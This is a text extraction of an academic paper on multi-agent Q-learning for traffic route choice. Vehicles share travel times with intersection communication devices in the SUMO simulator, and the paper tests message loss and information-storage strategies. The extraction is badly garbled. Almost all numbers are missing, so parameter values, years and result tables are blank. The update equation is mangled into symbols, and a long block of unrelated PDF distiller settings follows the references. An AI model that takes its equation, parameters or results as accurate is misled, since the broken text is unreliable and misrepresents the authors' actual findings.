a and γ are, respectively, the learning rate and the discounting factor for future values. qðs; aÞ ¼ qðs; aÞ þ aðr þ gmaxa½qðs ; a Þ � qðs; aÞ�Þ ( ) in a rl task, it is also important to define how the agent selects actions, while also exploring the environment. a common action selection strategy is the ε-greedy, in which dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the agent chooses to follow the optimal values with a probability − ε, and takes a random action with a probability ε. while this basic approach also works in marl, it is important to stress some challenging issues that arise in an environment where multiple agents are learning simultaneously. complicating issues arise firstly due to the fact that while one agent is trying to model the environment (other agents included), the others are doing the same and potentially changing the environment they share. hence the environment is inherently non-stationary. in this case, convergence guarantees, as previously known from single agent reinforcement learning (e.g., watkins & dayan ( ) regarding q-learning), no longer hold. a further issue in multi-agent reinforcement learning is the fact that aligning the optimum of the system (from the perspective of a central authority) and the optimum of each agent in a multi-agent system is even more complicated when there is a high number of agents interacting. related work solving the tap is not a new problem; there have been several works that aim at solving it. in one front, there are have classical methods (see chapter in ortúzar & willumsen ( )), which, as aforementioned, mostly deal with planning tasks. further, the tap can also be solved by imposing tolls on drivers (sharon et al., ; buriol et al., ; tavares & bazzan, ). the latter specifically connects road pricing with rl. however, the focus is on learning which prices to charge. besides these two fronts, rl for route choice is turning popular. when we refer to rl methods to solve the tap, these usually fall into two categories: a traditional rl method, and a stateless one. contrarily to the traditional approach, in the stateless case, the agents actually have only one state that is associated with its origin-destination pair, and they choose which actions to take. actions here correspond to the selection of one among k pre-computed routes. works in this category are ramos & grunitzki ( ) (using a learning automata approach), and grunitzki & bazzan ( ) (using q-learning). in zhou et al. ( ) the authors used a learning automata approach combined with a congestion game to reach the ue. tumer, welch & agogino ( ) adds a reward shaping component (difference utilities) to q-learning, aiming at aligning the ue to a socially efficient solution. apart from the stateless formulation, in the traditional case, agents may found themselves in multiple states, which are normally the nodes (intersections) of the network. actions then correspond to the selection of one particular link (edge) that leaves that node. in bazzan & grunitzki ( ) this is used to allow agents to learn how to build routes. however, they use a macroscopic perspective by means of cost functions that compute the abstract travel time. in the present article, the actual travel time is computed by means of a microscopic simulator (details ahead). a microscopic approach is required to handle communication issues. as aforementioned, our approach also includes c i communication, as these kinds of new technologies may lead agents to benefit from sharing their experiences (in terms of dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ travel times), thus reducing the time needed to explore, as stated in tan ( ). the use of communication in transportation systems, as proposed in the present paper, has also been studied previously (grunitzki & bazzan, ; bazzan, fehler & klügl, ; koster et al., ; auld, verbas & stinson, ). however, these works handle communication at abstract levels, using macroscopic approaches. in some cases, the information is manipulated to bias the agents to reach an expected outcome. moreover, most of these works deal with vehicular communication (i.e., messages are shared among the vehicles), or are based on broadcast of messages by one or few entities. this scheme approaches either systems such as traffic apps we see nowadays (waze, etc.), or messages distributed by the traffic authority (as it used to be the case some time ago, using radio or variable message panels on main roads as in wahle et al. ( )). neither vehicular communication nor broadcast are appropriate to investigate the impact of sharing local information, as we do here. a previous work by us (santos & bazzan, ) has presented preliminary results about the performance of combining rl with c i against rl without communication. however, in this work, it is assumed that messages exchanged among the various actors do not get lost, which is irrealistic. therefore, in the present article we focus on the impact of communication failure and also on what type of information yields better results. in a different perspective, works such as yu, han & ochieng ( ) evaluate the impact of incomplete information sharing in the tap. they do not employ a rl-based but rather a classical approach, namely multinomial logit model. more recently, bazzan & klügl ( ) discuss the effects of a travel app, in which driver agents share their experiences. the idea is to “mimic” what happens in an office where colleagues chat about their habits and route choice experiences. in the present article, driver agents do not directly share their experiences since the work in bazzan & klügl ( ) has shown that this process may lead to sub-optimal results, due to agents not taking local issues into account. this is hardly possible in that work since bazzan & klügl ( ) use a macroscopic simulator, where location is an abstract concept. rather, the present paper proposes—as shown in the “methods”—that the information is exchanged via an intersection manager, that is, a manager of a portion of the network. in any case, this sharing of knowledge was proposed in other scenarios (tan, ) and refers generally to the research on transfer learning (taylor et al., ; torrey & taylor, ; fachantidis, taylor & vlahavas, ; zimmer, viappiani & weng, ). it is important to note though, that virtually all these works deal with cooperative environments, where it makes sense to transfer knowledge. in non-cooperative learning tasks, as it is the case of route choice, naive transfer of learned policies may lead to every agent behaving the same, which runs against the notion of efficient distribution of agents in the road network. methods our approach is based on using communication to augment the information each agent has and, hence, the learning performance. the next three subsections discuss, respectively: how the infrastructure is represented; how communication occurs; and the details of the rl algorithm. we then formalize the details as an algorithm. henceforth, the term agent is used to refer to a vehicle and/or driver agent. dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ representing the infrastructure we assume that every node n ∈ n present in the network g is equipped with a communication device (henceforth, commdev) that is able to send and receive messages in a short range signal (e.g., with vehicles around the intersection). figure shows an scheme that represents g and commdevs within g. using the short-range signal, the commdevs are able to communicate with vehicles that are close enough, and are able to exchange information related to local traffic data (refer to next section for details). moreover, these commdevs are able to store the data exchanged with the agents in order to propagate this information to other agents that may use nearby intersections in the near future. the arrows that connect commdevs in fig. represent a planar graph, meaning that every commdev is connected and can communicate to its neighboring devices. this permits that commdevs get information about the traffic situation in neighboring edges, which is then passed to the agents. how communication works every time an agent reaches an intersection, prior to choosing an action (the next intersection to visit), it communicates with the intersection’s commdev (see fig. ) to exchange information. the actual piece of information sent from agents to commdevs is travel times (hence, rewards) received by the agents, regarding their last action performed. conversely, the infrastructure communicates to the agent information about the state of the nearby edges, in terms of which rewards an agent can expect if it selects to use that particular link. this information can be of various forms. in all cases, the expected figure scheme of the communication infrastructure. this figure was designed using assets from https://www.vectorportal.com/ and https://www.freepik.com. all assets used fall under license cc by . . full-size doi: . /peerj-cs. /fig- dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / https://www.vectorportal.com/ https://www.freepik.com http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reward is computed by taking into account the rewards informed by other agents, when they have used nearby links. in the experiments, we show results where commdevs communicate expected rewards that are either an aggregation (over a time window) or just a single value. in any of these cases, an agent receiving such information will then take it into account when selecting an action (choice of a link) in that particular state (a node). next, details about how the information is processed, by both the commdevs and the vehicle agents, are given. information hold by infrastructure each commdev uses queue based data structures to hold the rewards informed by each agent that passes through it. specifically, each edge is associated with one data queue. these queues have a maximum size, and when new information arrives after the queue is full, the oldest reward stored is discarded to make room to the most recent one. when an agent requests information, the commdev retrieves the rewards collected for the agent’s possible actions and passes it to that agent. recall that an action corresponds to a link to be traveled next, in order to form a route to the agent’s destination. information used by the agent in a standard q-learning algorithm, the agents update their q-values based on the feedback from the action they have just taken. however, in our case agents also update their q-values based on the expected rewards received by the infrastructure. this means that every time they reach an intersection, they update their q-values with the information provided by the commdevs. we do this in order to accelerate the learning process. instead of just considering its own past experiences, the information provided by the commdevs augment the knowledge each agent has. it is worth noting that a distinguishing characteristic of our approach is that it deals with local information, thus the information received from the commdev only concerns actions that can be selected from that particular node. given a network g, every agent (vehicle) v ∈ v has a pair (o, d) ∈ n × n, that defines its origin-destination pair (od-pair). nodes n ∈ n are seen as states the agents might be in, and the outgoing edges of a node n are the possible actions for that given state. hence, the agents build their routes on-the-fly by visiting nodes and edges. upon choosing an action (edge) e, v perceives its reward. we recall that being a microscopic model, this reward is actually computed by the simulator, rather than by an abstract cost function, as it would be the case in a macroscopic model. assuming that the simulator reports a travel time of tve for agent v traveling on edge e, the reward is −tve, as we want to make sure the agents prefer to take edges that minimize travel times. this alone does not guarantee that the agents will reach their destination fast, as they might end up running in loops throughout the network. hence a positive bonus b is given to each agent that reaches its destination, giving them incentives to end their trips as fast as possible. dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we deal with a commuting scenario, where each agent performs day-to-day experiments in order to reach an equilibrium situation, in which no agent can reduce its travel time by changing routes. because agents belong to different od pairs and/or select different routes, their trips take different number of simulation steps. these steps represent elapsed seconds in simulation time. hence, this means that not every agent finishes its trip simultaneously and, therefore, the standard notion of a learning episode cannot be used here. rather, each agent has its own learning episode that will take as many simulation steps as necessary to reach its destination. next, we explain the main parts of our approach, which can be seen in algorithm . line list the inputs of algorithm : g is the topology of the network, d is the demand (flow rate) that is inserted in the network, p is the set of od-pairs, and m is the maximum number of steps to simulate. it is also necessary to set α, γ (both relating to eq. ( )), ε for controlling the action selection and the exploration-exploitation strategy, and the bonus b. the main loop is presented between lines and , where the learning and the communication actually take place. the first if statement shown in line takes care of all agents that finished their trips in the current step: agents perceive their reward plus the bonus for finishing the trip. at line , each agent informs the corresponding commdevs the rewards, and since its trip has ended, it gets reinserted at the origin node to start a new learning episode (as this is a commuting scenario). the if statement at line represents the intermediary nodes, where each agent also perceives its reward and informs the commdev (line ) about the reward just algorithm q-learning with c i. : input: g, d, p, m, α, γ, ε, b : s← : while s < m do : for v in v do : if v. f inished_trip() then : v.update_q_table(b−v.last_edge_travel_time) : g.commdev[v.curr_node].update_queue(v.last_reward, v.last_edge) : v.start_new_commuting_trip() : else if v.has_reached_a_node() then : v.update_q_table(−v.last_edge_travel_time) : g.commdev[v.curr_node].update_queue(v.last_reward, v.last_edge) : v.update_q_values(g.commdev[v.curr_node].in f o) : v.choose_action() : end if : end for : s←s+ : end while dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experienced, so that the commdev can update its queue structure. in line , each agent updates its q-value for the last action based on its own experience, that is, with the actual reward received for traveling through the last link. following, a commdev also informs agents about the rewards that can be expected from the actions each agent might take next (line ). each agent then updates its q-table and chooses an action. experiments, results, and analysis scenario: network and demand simulations were performed using a microscopic tool called simulation of urban mobility (sumo, lopez et al. ( )). sumo’s api was used to allow vehicle agents to interact with the simulator en route, that is, during simulation time. the scenario chosen is a × grid depicted in fig. ; each line in the figure represents bi-directed edges containing two lanes, one for each traffic direction. it is also worth noting that each directed edge is m long. the demand was set to maintain the network populated at around – % of its maximum capacity, which is considered a medium to high density. recall that no real-world network is fully occupied at all times, and that the just mentioned density level does not mean that there will not be edges fully occupied, which happens from time to time; this percentage is just the average over all edges. this demand was then distributed between the od-pairs as represented in table . the last column represents the volume of vehicles per od-pair. those values were selected so that the shorter the path, the smaller the demand, which seems to be a more realistic assumption than a uniform distribution of the demand. a a a a a b b b b b c c c c c d d d d d e e e e e left left left left left right right right right right bottom bottom bottom bottom bottom top top top top top figure × grid network. full-size doi: . /peerj-cs. /fig- dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ two points are worth reinforcing here. first, vehicles get reinserted at their corresponding origin nodes, so that we are able to keep a roughly constant insertion rate of vehicles in the network, per od pair. however, this does not mean that the flow per link is constant, since the choice of which link to take varies a lot from vehicle to vehicle, and from time to time. second, despite being a synthetic grid network, it is not trivial, since it has od pairs, which makes the problem complex as routes from each od pair are coupled with others. as seen in table , we have also increased such coupling by designing the od pairs so that all routes traverse the network, thus increasing the demand for using the central links. q-learning parameters a study conducted by bazzan & grunitzki ( ) shows that, in an en route trip building approach, the learning rate a does not play a major role, while the discount factor γ usually needs to be high in discounted future rewards, as it is the case here. thus a value of a = . suits our needs. we remark however that we have also played with this parameter. as for the discount factor γ, we have performed extensive tests and found that a value of γ = . performs best. for the epsilon-greedy action selection, empirical analysis pointed to using a fixed value of ε = . . this guarantees that the agents will mostly take a greedy action (as they only have a % chance to make a non-greedy choice), and also take into account that the future rewards have a considerable amount of influence in the agent’s current choice, since γ has a high value. for the bonus at the end of each trip, after tests, a value of b = , was used. recall that this bonus aims at compensating the agent for selecting a jammed link, if it is close to its destination, rather than trying out detours via a link that, locally, seems less congested, but that will lead the agent to wander around, rather than directly go to its destination. we remark that trips take a rough average of time steps thus this value of b fits the magnitude of the rewards. performance metric and results while each agent perceives its own travel time, both after traversing each link, and after finishing its trip, we need an overall performance to assess the quality of the proposed table demand per od-pair. origin destination demand bottom top bottom top bottom top bottom top left right left right left right left right dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ method. for this, we use a moving average (over time steps) of the complete route travel time, for each agent that has finished its trip. given the probabilistic nature of the process, it is necessary to run repetitions of simulations. thus, runs were performed. plots shown ahead thus depict the average and the standard deviations. in order to evaluate how the communication affects the learning process, some different policies and comparisons were performed, these different methods are described in the following sections. ql with c i vs dynamic user assignment for sake of contrasting with a classical approach, fig. shows a comparison between our ql with c i approach and a method called dynamic user assignment (dua), which is an iteractive method implemented by the sumo developers. we remark that dua is a centralized, not based on rl approach. dynamic user assignment works as follows: it performs iterative assignment of pre-computed, full routes to the given od-pairs in order to find the ue . in our tests, dua was run for iterations. note that a dua iteration corresponds to a trip, and a new iteration only starts when all trips have reached their respective destinations. the output of dua is a route that is then followed by each vehicle, without en route changes. since dua also has a stochastic nature, our results correspond to repetitions of dua as well. figure shows that, obviously, at the beginning, the performance of our approach reflects the fact that the agents are still exploring, whereas dua has a better performance since a central authority determines which route each agent should take. this is possible since this central authority holds all the information, which is not the case in the marl based approach, where each agent has to explore in order to gain information. in our approach, after a certain time, the agents have learned a policy to map states to action and, by using it, they are able to reduce their travel times. figure ql with c i vs dua. full-size doi: . /peerj-cs. /fig- for details on how the dua method is made the reader may refer to https:// sumo.dlr.de/docs/demand/dynamic_ user_assignment.html. dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://sumo.dlr.de/docs/demand/dynamic_user_assignment.html https://sumo.dlr.de/docs/demand/dynamic_user_assignment.html https://sumo.dlr.de/docs/demand/dynamic_user_assignment.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ before discussing the actual results, we remark that a sumo time step corresponds roughly to one second. our experiments were run for about , time steps. a learning episode comprehends hundreds of time steps, as the agent has to travel from its origin to its destination. in short, a learning episode is not the same as a simulation time step. given that the agents re-start their trips immediately, different agents have different lengths for their respective learning episodes, thus the learning process is non-synchronous. using our approach, on average, an episode takes roughly time steps, thus agent reach the user equilibrium in about episodes. for rl standards, this is a fast learning process, especially considering that we deal with a highly non-stationary environment, where agents get noisy signals. however, we also remark that, for practical purposes, the policy can be learned off-line, and, later, embedded in the vehicle. to give a specific picture, table shows the actual travel times after time step , . we remark that we could have measured roughly the same around step , . it can be seen that our approach outperforms dua shortly after time step , . also noteworthy is the fact that, at any time step, agents still explore with probability ε = % thus there is room for improvements if other forms of action selection are used. ql with c i vs ql without communication our approach is also compared to standard q-learning, thus without communication, which means that the agents learn their routes only by their own previous experiences, without any augmented knowledge regarding the traffic situation and the experiences of other agents. in fig. , we can divide the learning process in both cases shown in fig. in two distinct phases: the exploration phase, where the agents have yet no information about the network and explore it to find their destination “that is when the spikes in the learning curves can be seen”; and the exploitation phase, when agents know the best actions to take in order to experience the lowest travel time possible. both approaches converge to the same average travel times in the exploitation phase. however, the advantage of our approach comes in the exploration phase. as we see in fig. , the exploration phase in the ql with c i algorithm is reduced by a considerable amount when compared to the traditional ql algorithm, meaning that in our case the user equilibrium is reached earlier. table compares the travel time measured in both cases at the time step , , when our approach has already converged, but the standard q-learning has not. communication success rate in the real world, it might be the case that some information gets lost due to failure in the communication devices. in order to test what happens when not all messages reach the table travel time measured for dua and ql with c i at time step , . method travel time at step k dua ≈ ql with c i ≈ dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ recipient, a success rate was implemented to test how the our approach performs if communication does not work as designed. specifically, every time an agent needs to communicate with the infrastructure, the message will reach the destination with a given success rate. this was implemented by means of a randomly generated value, which is then compared to the success rate to determine whether or not the simulator should ignore the message, thus being a metaphor for a non-delivered message. such a scheme is applied to any kind of communication between the infrastructure and the agent, that is, regardless if it is from an agent to a commdev, or vice-versa. if a message is lost, then: (i) a commdev does not get to update its data structure, and (ii) an agent does not get to update its q-table. other than that, the method behaves exactly as described by algorithm . experiments were performed varying the target success rate. for clarity, we show the results in two plots. figure compares the approach when the success rate is with % (thus the performance already discussed regarding the two previous figures), to one where the communication succeeds in only % of the times. in fig. , we depict the cases for success rate of % and %. for specific values, table lists the average travel times for all these cases at time step , , since at that time the learning processes have nearly converged. figure ql with c i vs ql without communication. full-size doi: . /peerj-cs. /fig- table travel time measured for ql and ql with c i at time step , . method travel time at step k ql ≈ ql with c i ≈ dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it is remarkable that the system not only tolerates some loss of information, but also performs slightly better when the success rate is % or even %. if one compares this case to the one in which % of the messages reach their destinations, one sees that the learning process is accelerated if agents do not have the very same information that other agents also receive. this is no surprise, as pointed out in the literature on the disadvantages of giving the same information to everyone. what is novel here is the fact that we can show that this is also the case when information is shared only at local level, as figure ql with c i: comparison between % and % success rate. full-size doi: . /peerj-cs. /fig- figure ql with c i: comparison between % and % success rate. full-size doi: . /peerj-cs. /fig- dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ well as when the communication is between vehicles and the infrastructure, not among all vehicles themselves. as expected, when we look at the case with a low success rate of %, we observe several drawbacks since the communication rate is getting closer to no communication at all: (i) the average travel time increases, (ii) the learning process takes longer, and (iii) the standard deviation also increases (meaning that different trips may take very different travel times and, possibly, different routes). different strategies for storing information at the infrastructure apart from investigating what happens when information is lost, we also change the way commdevs compute and share the reward information to the driver agents. here the main motivation was to test what happens when the infrastructure is constrained by a simpler type of hardware, namely one that can store much less information (recall that the original approach is based on a queue-like data structure). to this aim, we conducted experiments in which the goal was to test which type of information is best for the infrastructure to hold and pass on to the agents. we have devised three ways to do this: (i) the infrastructure only holds and informs the highest travel time (hence the most negative reward) value to the agents; (ii) the infrastructure informs the lowest reward (hence the least negative) to the agents; (iii) the infrastructure holds only the latest (most recent) travel time value received. note that, in all these cases, the infrastructure only needs to store a single value, as opposed to the case in which the infrastructure stores a queue of values in order to compute a moving average. figure shows a comparison between the different policies. for clarity, we omit the deviations but note that they are in the same order as the previous ones. the best case seems to be associated with the use of the most recent travel time information, as seen both in fig. and table . communicating the lowest travel time might look good at first sight. but it has as drawback that this leads all agents to a act greedly and thus using the option with least travel time. this ends up not being efficient as seen in fig. . conversely, communicating the highest travel time is motivated by the fact that the infrastructure might want to distribute the agents among the options available, thus communicating a high travel time leads to not all agents considering it: since some would have experienced a better option before and hence have this knowledge in their q-tables, they will not use the information received. this proves to be the second best strategy, only behind the aforementioned strategy on communicating the latest information. the reason for the good performance of the latter is the fact that the latest table travel time measured for each success rate at time step , . success rate (%) travel time at step k ≈ ≈ ≈ ≈ dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ information is diverse enough (i.e., varies from recipient agent to agent) so that it also guarantees a certain level of diversity in the action selection, thus contributing to a more even distribution of routes. conclusions and future work a wise route choice is turning more and more important when the demand is increasing and road networks are not being expanded in the same proportion. marl is an attractive method for letting agents autonomously learn how to construct routes while they are traveling from a to b. this article presented a method that combines marl with c i communication. vehicles interact with the infrastructure every time they reach an intersection. while they communicate the travel times they have experienced in nearby links, they also receive the expect travel times regarding their next possible link choices. we have extended a previous approach by relaxing the assumption that all messages are sent and received, that is, there is no loss of messages. to the best of our knowledge, this is a novel investigation to scenarios dealing with learning based route choice, where the there is a sharing of local information via c i. figure ql with c i with different strategies. full-size doi: . /peerj-cs. /fig- table travel time measured for each strategy at time step , . strategy travel time at step k highest travel time ≈ latest travel time ≈ lowest travel time ≈ ql with c i ≈ dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this work thus has the following contributions: we employ marl to the task of learning; we do this using a non trivial scenario with more than one origin-destination pair; we depart from the assumption that driver agents already know a set of (pre-computed) routes to select among; we use a microscopic, agent-based approach; we connect marl with new communication technologies, in order to investigate whether the learning process can be accelerated. also, we have employed our method to test some real-world situations that may arise, namely communication loses and the need to use simpler hardware devices to store information by the infrastructure. our results show that, before deploying c i communication in the real-world, one has to take into account the various effects of sharing information, even at local level. we were able to show that one has to strive to communicate information that is diverse enough, in order to avoid sub-optimal route choices, that is, those that are made by drivers having similar information. as these drivers tend to act greedly, a wise strategy on sharing information is key. specifically, our results point out to our approach being tolerant to information loses; further, there was even a slight improvement in the overall performance (i.e., learning speed) since less information also mean that not all agents will act the same way. as for the different strategies regarding storage of information in the infrastructure, we could show that communicating only the latest known travel time is able to speed up the learning process. we remark that in all cases we have tested, marl was able to reach the user equilibrium. the major difference is the speed of such process. for future work, one possible investigation is the addition of a biased information provided by the infrastructure in order to reach a different outcome, namely, to reach the system optimum (socially efficient distribution of routes to vehicles), rather than converging to the user equilibrium. we also plan to change the demand during simulation time, to check how the learners deal with such changes. preliminary work on using q-learning in such dynamic environments point out that it is able to handle different situations. however, it remains to be investigated whether this is also the case for changes in flow rates. moreover, we would like to study whether the proposed combination of q-learning with c i is able to speed up the learning processes as much as it was the case in the present work. additional information and declarations funding this work was supported by cnpq under grant no. / - (ana bazzan), by capes (coordenação de aperfeiçoamento de pessoal de nível superior—brazil, finance code ), and by a fapergs grant (guilherme d. dos santos). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grant disclosures the following grant information was disclosed by the authors: cnpq: / - . capes (coordenação de aperfeiçoamento de pessoal de nível superior—brazil): . fapergs. competing interests the authors declare that they have no competing interests. author contributions � guilherme dytz dos santos conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. � ana l.c. bazzan conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code is available at github: https://github.com/guidytz/sumo-ql. references auld j, verbas o, stinson m. . agent-based dynamic traffic assignment with information mixing. procedia computer science ( ): – doi . /j.procs. . . . bazzan alc, fehler m, klügl f. . learning to coordinate in a network of social drivers: the role of information. in: tuyls k, hoen pj, verbeeck k, sen s, eds. proceedings of the international workshop on learning and adaptation in mas (lamas ), number in lecture notes in artificial intelligence. – . bazzan alc, grunitzki r. . a multiagent reinforcement learning approach to en-route trip building. in: international joint conference on neural networks (ijcnn), – . bazzan alc, klügl f. . experience sharing in a traffic scenario. in: proceedings of the th international workshop on agents in traffic and transportation, santiago de compostella. buriol ls, hirsh mj, pardalos pm, querido t, resende mg, ritt m. . a biased random-key genetic algorithm for road congestion minimization. optimization letters ( ): – doi . /s - - - . fachantidis a, taylor me, vlahavas ip. . learning to teach reinforcement learning agents. machine learning and knowledge extraction ( ): – doi . /make . grunitzki r, bazzan alc. . combining car-to-infrastructure communication and multi-agent reinforcement learning in route choice. in: bazzan alc, klügl f, ossowski s, vizzari g, eds. proceedings of the ninth workshop on agents in traffic and transportation (att- ). new york: ceur-ws.org. grunitzki r, bazzan alc. . comparing two multiagent reinforcement learning approaches for the traffic assignment problem. in: brazilian conference on intelligent systems (bracis). koster a, tettamanzi a, bazzan alc, pereira cdc. . using trust and possibilistic reasoning to deal with untrustworthy communication in vanets. in: proceedings of the th ieee dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/guidytz/sumo-ql http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /make http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ annual conference on intelligent transport systems (ieee-itsc), the hague, the netherlands. piscataway: ieee, – . lopez pa, behrisch m, bieker-walz l, erdmann j, flötteröd y-p, hilbrich r, lücken l, rummel j, wagner p, wießner e. . microscopic traffic simulation using sumo. in: the st ieee international conference on intelligent transportation systems. piscataway: ieee. ortúzar jdd, willumsen lg. . modelling transport. fourth edition. chichester: john wiley & sons. ramos gdo, grunitzki r. . an improved learning automata approach for the route choice problem. in: koch f, meneguzzi f, lakkaraju k, eds. agent technology for intelligent mobile services and smart societies, volume of communications in computer and information science. berlin, heidelberg: springer, – . santos gdd, bazzan alc. . accelerating learning of route choices with c i: a preliminary investigation. in: proceedings of the viii symposium on knowledge discovery, mining and learning, sbc, – . sharon g, hanna jp, rambha t, levin mw, albert m, boyles sd, stone p. . real-time adaptive tolling scheme for optimized social welfare in traffic networks. in: das s, durfee e, larson k, winikoff m, eds. proceedings of the th international conference on autonomous agents and multiagent systems (aamas ). são paulo: ifaamas, – . tan m. . multi-agent reinforcement learning: independent vs. cooperative agents. in: proceedings of the tenth international conference on machine learning (icml ). morgan kaufmann, – . tavares ar, bazzan al. . an agent-based approach for road pricing: system-level performance and implications for drivers. journal of the brazilian computer society ( ): doi . / - - - . taylor a, dusparic i, lópez eg, clarke s, cahill v. . accelerating learning in multi-objective systems through transfer learning. in: international joint conference on neural networks (ijcnn), beijing, china. piscataway: ieee, – . torrey l, taylor me. . teaching on a budget: agents advising agents in reinforcement learning. in: proceedings of the international conference on autonomous agents and multi- agent systems, st. paul, mn, usa, ifaamas. tumer k, welch zt, agogino a. . aligning social welfare and agent preferences to alleviate traffic congestion. in: padgham l, parkes d, müller j, parsons s, eds. proceedings of the th international conference on autonomous agents and multiagent systems. estoril: ifaamas, – . wahle j, bazzan alc, klügl f, schreckenberg m. . decision dynamics in a traffic scenario. physica a ( – ): – doi . /s - ( ) - . wardrop jg. . some theoretical aspects of road traffic research. proceedings of the institution of civil engineers, part ii ( ): – doi . /ipeds. . . watkins cjch, dayan p. . q-learning. machine learning ( ): – . yu y, han k, ochieng w. . day-to-day dynamic traffic assignment with imperfect information, bounded rationality and information sharing. transportation research part c: emerging technologies ( ): – doi . /j.trc. . . . zhou b, song q, zhao z, liu t. . a reinforcement learning scheme for the equilibrium of the in-vehicle route choice problem based on congestion game. applied mathematics and computation ( ): doi . /j.amc. . . zimmer m, viappiani p, weng p. . teacher-student framework: a reinforcement learning approach. in: aamas workshop autonomous robots and multirobot systems, paris, france. dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - - - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /ipeds. . http://dx.doi.org/ . /j.trc. . . http://dx.doi.org/ . /j.amc. . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. sharing diverse information gets driver agents to learn faster: an application in en route trip building introduction background and related work methods experiments, results, and analysis conclusions and future work references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile 